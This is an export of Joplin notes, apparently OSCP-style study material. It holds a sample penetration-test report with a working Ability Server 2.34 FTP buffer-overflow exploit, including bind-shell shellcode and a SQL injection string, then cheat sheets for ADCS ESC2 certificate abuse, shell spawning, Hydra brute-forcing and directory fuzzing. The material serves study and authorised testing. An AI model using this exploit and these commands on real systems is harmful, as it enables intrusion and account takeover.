One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.

# Sample Report - Methodologies

Alfred utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure.
Below is a breakout of how Alfred was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.

## Sample Report - Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
During this penetration test, Alfred was tasked with exploiting the lab and exam network.
The specific IP addresses were:

**Exam Network**

172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136

## Sample Report - Service Enumeration

The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
In some cases, some ports may not be listed.

## Sample Report - Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
During this penetration test, Alfred was able to successfully gain access to **X** out of the **X** systems.

## Sample Report - Maintaining Access

Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.

Alfred added administrator and root level accounts on all systems compromised.
In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.

## Sample Report - House Cleaning

The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road.
Ensuring that we are meticulous and no remnants of our penetration test are left over is important.

After the trophies on the exam network were completed, Alfred removed all user accounts and passwords as well as the meterpreter services installed on the system.
Offensive Security should not have to remove any user accounts or services from the system.

# Independent Challenges

## Target #1 - 192.168.x.x

### Service Enumeration

**Port Scan Results**

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.1.1       | **TCP**: 21,22,25,80,443

**FTP Enumeration**

_Upon manual enumeration of the available FTP service, Alfred noticed it was running an outdated version 2.3.4 that is prone to the remote buffer overflow vulnerability._

### Initial Access - Buffer Overflow

**Vulnerability Explanation:** Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field.
Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system.

**Vulnerability Fix:** The publishers of the Ability Server have issued a patch to fix this known issue.
It can be found here: http://www.code-crafters.com/abilityserver/

**Severity:** Critical

**Steps to reproduce the attack:** The operating system was different from the known public exploit.
A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave Alfredfull administrative access over the system.

**Proof of Concept Code Here:** Modifications to the existing exploit was needed and is highlighted in red.

```python
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow
# Advanced, secure and easy to use FTP Server.
# 21 Oct 2004 - muts
###################################
# D:\BO>ability-2.34-ftp-stor.py
###################################
# D:\data\tools>nc -v 127.0.0.1 4444
# localhost [127.0.0.1] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# D:\Program Files\abilitywebserver>
###################################

import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFor Educational Purposes Only!\n"
print "###################################"

# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"

sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
# Change RET address if need be.
buffer = '\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4
#buffer = '\x41'*970+struct.pack('<L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2
try:
# Edit the IP, Username and Password.
ftp = FTP('127.0.0.1')
ftp.login('ftp','ftp')
print "\nEvil Buffer sent..."
print "\nTry connecting with netcat to port 4444 on the remote machine."
except:
print "\nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer)
except:
print "\nDone."
```

**Proof Screenshot:**

![ImgPlaceholder](img/placeholder-image-300x225.png)

\newpage

### Privilege Escalation - MySQL Injection

**Vulnerability Explanation:** After establishing a foothold on target, Alfred noticed there were several applications running locally, one of them, a custom web application on port 80 was prone to SQL Injection attacks.
Using Chisel for port forwarding, Alfred was able to access the web application.
When performing the penetration test, Alfred noticed error-based MySQL Injection on the taxid query string parameter.
While enumerating table data, Alfred was able to successfully extract the database root account login and password credentials that were unencrypted that also matched username and password accounts for the administrative user account on the system and Alfredwas able to log in remotely using RDP.
This allowed for a successful breach of the operating system as well as all data contained on the system.

**Vulnerability Fix:** Since this is a custom web application, a specific update will not properly solve this issue.
The application will need to be programmed to properly sanitize user-input data, ensure that the user is running off of a limited user account, and that any sensitive data stored within the SQL database is properly encrypted.
Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them.

**Severity:** Critical

**Steps to reproduce the attack:**

**Proof of Concept Code Here:**

```sql
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
```

### Post-Exploitation

**System Proof Screenshot:**

![ImgPlaceholder](img/placeholder-image-300x225.png)

## Target #2 - 192.168.x.x

### Service Enumeration

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.1.2       | **TCP**: 22,55,90,8080,80

**Nmap Scan Results:**

*Initial Shell Vulnerability Exploited*

*Additional info about where the initial shell was acquired from*

### Initial Access - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

**Proof Screenshot:**

**local.txt content:**

### Privilege Escalation - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

### Post-Exploitation

**Proof Screenshot:**

**proof.txt content:**

## Target #3 - 192.168.x.x

### Service Enumeration

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.1.3       | **TCP**: 1433,3389\
**UDP**: 1434,161

**Nmap Scan Results:**

*Initial Shell Vulnerability Exploited*

*Additional info about where the initial shell was acquired from*

### Initial Access - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

**Proof Screenshot:**

**local.txt content:**

### Privilege Escalation - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

### Post-Exploitation

**Proof Screenshot:**

**proof.txt content:**

# Active Directory Set

**Port Scan Results**

IP Address | Ports Open
------------------|----------------------------------------
192.168.x.x       | **TCP**: 1433,3389\
**UDP**: 1434,161
192.168.x.x       | **TCP**: 1433,3389\
**UDP**: 1434,161
192.168.x.x       | **TCP**: 1433,3389\
**UDP**: 1434,161

## Hostname1: 192.168.x.x

### Initial Access - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

**Proof Screenshot:**

**local.txt content:**

### Privilege Escalation - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

### Post-Exploitation

**Proof Screenshot:**

**proof.txt content:**

## Hostname2: 192.168.x.x

### Initial Access - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

**Proof Screenshot:**

**local.txt content:**

### Privilege Escalation - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

### Post-Exploitation

**Proof Screenshot:**

**proof.txt content:**

## Hostname3: 192.168.x.x

### Initial Access - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**

**Proof Screenshot:**

**local.txt content:**

### Privilege Escalation - XXX

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Steps to reproduce the attack:**

**Proof of Concept Code:**
Please see Appendix 1 for the complete Windows Buffer Overflow code.

### Post-Exploitation

**Proof Screenshot:**

**proof.txt content:**

# Additional Items Not Mentioned in the Report

This section is placed for any additional items that were not mentioned in the overall report.

id: f03d530e1dd54b3a966f1cf8323a483c
parent_id: 729926ecd3684d6fa271e50fceb6dad9
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-08-02T04:11:32.220Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132973
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-08-02T04:11:32.220Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1f28636a6c4ee4dea972b6e79261b0c35.md000644 0000003424 14666154175012641 0ustar00000000 000000 4. ESC2 Certificate Templates

# General Overview: 

In order to abuse ESC2 certificate templates, the requirements are similar to those in ESC1, but with one key difference: if the template specifies the EKU as "Any Purpose" or doesn't specify an EKU at all, the certificate becomes versatile and can be used for any purpose. 

# Abusing ESC2 Certificates

## Certipy:
- `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -alt 'xadmin@megacorpone.com'
## Certi
- `python certi.py 'megacorpone.com/afsimmons@dc01.megacorpone.com' megacorpone-DC01-CA -k -n --alt-name 'xadmin@megacorpone.com' --template vulnerable-ec2-template`
## BloodyAD

- Source: https://github.com/CravateRouge/bloodyAD
- python bloodyAD.py -u alfred.simmons -p 'SuperSpawn123!' --host 172.21.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=megacorpone,DC=com' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))'

id: f28636a6c4ee4dea972b6e79261b0c35
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-19T03:01:52.400Z
updated_time: 2024-08-30T01:42:30.375Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132241
user_created_time: 2024-08-19T03:01:52.400Z
user_updated_time: 2024-08-30T01:42:30.375Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1f497f09817204252a2bcf9c1fb249673.md000644 0000000623 14666154175012417 0ustar00000000 000000 Scheduled Jobs and Tasks

id: f497f09817204252a2bcf9c1fb249673
created_time: 2024-09-04T21:42:12.726Z
updated_time: 2024-09-04T21:42:12.726Z
user_created_time: 2024-09-04T21:42:12.726Z
user_updated_time: 2024-09-04T21:42:12.726Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2f5b6f52827df4dfd8523222cd85dcaa6.md000644 0000000625 14666154175012777 0ustar00000000 000000 1. Cracking Hashes Offline

id: f5b6f52827df4dfd8523222cd85dcaa6
created_time: 2024-09-04T21:42:12.840Z
updated_time: 2024-09-04T21:59:00.696Z
user_created_time: 2024-09-04T21:42:12.840Z
user_updated_time: 2024-09-04T21:59:00.696Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: dcb4d790b01144b7ada27167784dae15
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2f753f0995313477e8a1959c3007dfa6b.md000644 0000005026 14666154175012430 0ustar00000000 000000 General Notes

## Spawn a tty: 

1. rlwrap nc localhost 80

2. rlwrap -r -f . nc "IP ADDRESS" "PORT"

- socat file:`tty`,raw,echo=0 tcp-listen:12345
- /bin/sh -i
- /bin/bash -i
- python -c 'import pty; pty.spawn("/bin/sh")'
- perl -e 'exec "/bin/sh";'
- perl: exec "/bin/sh";
- ruby: exec "/bin/sh"
- lua: os.execute('/bin/sh')

# Privilege Escalation Scripts:

## Windows:
- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
- Sherlock: https://github.com/rasta-mouse/Sherlock
- Powersploit: https://github.com/PowerShellMafia/PowerSploit
- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- PrivescCheck: https://github.com/itm4n/PrivescCheck 

## Linux:
- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
- LinEnum: https://github.com/rebootuser/LinEnum
- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- Cadiclus: https://github.com/tjnull/pentest-arsenal/tree/main/Cadiclus

# Other Resources/Tools: 

## Windows: 
- LOLBAS: https://lolbas-project.github.io/#
- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
- Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
- PowerSharpPack:  https://github.com/S3cur3Th1sSh1t/PowerSharpPack 
- SharpCollection: https://github.com/Flangvik/SharpCollection
- Watson: https://github.com/rasta-mouse/Watson
- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn


## Linux: 
- GTFOBins: https://gtfobins.github.io/
- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation

id: f753f0995313477e8a1959c3007dfa6b
parent_id: 533f89ee69a545b7a416b814f14e5d3d
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-09-04T04:56:48.703Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132568
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-09-04T04:56:48.703Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1f77ffebdf524416ca2f9632ddd6b2de2.md000644 0000000601 14666154175013131 0ustar00000000 000000 2. SSH

id: f77ffebdf524416ca2f9632ddd6b2de2
created_time: 2024-09-04T21:42:12.169Z
updated_time: 2024-09-04T21:42:12.169Z
user_created_time: 2024-09-04T21:42:12.169Z
user_updated_time: 2024-09-04T21:42:12.169Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2f84682d45a1647729d438e74c92a474f.md000644 0000000613 14666154175012357 0ustar00000000 000000 2. Recon Targets

id: f84682d45a1647729d438e74c92a474f
created_time: 2024-09-04T21:42:12.085Z
updated_time: 2024-09-04T21:43:21.464Z
user_created_time: 2024-09-04T21:42:12.085Z
user_updated_time: 2024-09-04T21:43:21.464Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2f96c31d1964f4b4fbb71d1f38cbe609c.md000644 0000001660 14666154175012777 0ustar00000000 000000 Hydra

- hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22

- hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22

- hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

id: f96c31d1964f4b4fbb71d1f38cbe609c
parent_id: 9c59a3d98f504cec8c622ed70c2faa4c
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132889
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1fcae5b9424134a7a83eec15fbba62c4f.md000644 0000006202 14666154175013114 0ustar00000000 000000 Directory Fuzzing

# Web Tools for Directory Scanning: 

## Dirb: 

- dirb http://172.21.0.0 "wordlist"
- dirb http://172.21.0.0

## Gobuster: 

- gobuster dir -u http://172.21.0.0 -w /usr/share/wordlists/"Wordlist file"
- gobuster dir -u http://172.21.0.0  -w /usr/share/wordlists/"Wordlist file" -a Firefox (Custom Agent)
- gobuster dir -u http://172.21.0.0 -w /usr/share/wordlists/"Wordlist file" -x .php,.txt,.html
- gobuster dir -u http://172.21.0.0 -w /usr/share/wordlists/"Wordlist file"-x .php,.txt,.html -s "200"
- gobuster dir -e -u http://172.21.0.0 -w /usr/share/wordlists/"Wordlist file" -x .php,.txt,.html -s "200"
- gobuster dir -v -e -u http://172.21.0.0 -w /usr/share/wordlists/"Wordlist file" -x .php,.txt,.html -s "200"
- gobuster dir -v -e -u http://172.21.0.0 -w /usr/share/wordlists/"Wordlist file" -x .php,.txt,.html -s "200" -o output.txt
- gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'

## Wfuzz:

- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)

- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)

## Dirsearch: 

- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

## FFuF:

- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403, 302, 200
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0
- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5

## Feroxbuster:

- feroxbuster -u http://172.21.0.0
- feroxbuster -u http://172.21.0.0 -w "wordlist-file"
- feroxbuster -u http://172.21.0.0 -w "wordlist-file" -t 50
- feroxbuster -u http://172.21.0.0 -H "User-Agent: user-agent-string"-w "wordlist-file"
- feroxbuster -u http://172.21.0.0 -C "cookie" -w "wordlist-file"
- feroxbuster -u http://172.21.0.0 --insecure -w "wordlist-file"


id: fcae5b9424134a7a83eec15fbba62c4f
parent_id: 683f633e9ae24821b9411611851581bd
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-03T15:26:35.093Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132349
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-03T15:26:35.093Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1ffbc05545674489e9752854ceb5c9e3b.md000644 0000002005 14666154175012575 0ustar00000000 000000 General Notes

# When in Doubt...Always Enumerate! Enumeration is the key!

## Resources
- http://www.0daysecurity.com/penetration-testing/enumeration.html
- Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html
-  https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology


id: ffbc05545674489e9752854ceb5c9e3b
parent_id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T05:36:48.399Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132106
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T05:36:48.399Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1ffe42db376c14927800f461505486841.md000644 0000001504 14666154175012255 0ustar00000000 000000 Impacket General Notes

## In Kali

apt install impacket-scripts

## Github

https://github.com/fortra/impacket

## Local Locations:

/usr/share/doc/python3-impacket/examples



id: ffe42db376c14927800f461505486841
parent_id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132114
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1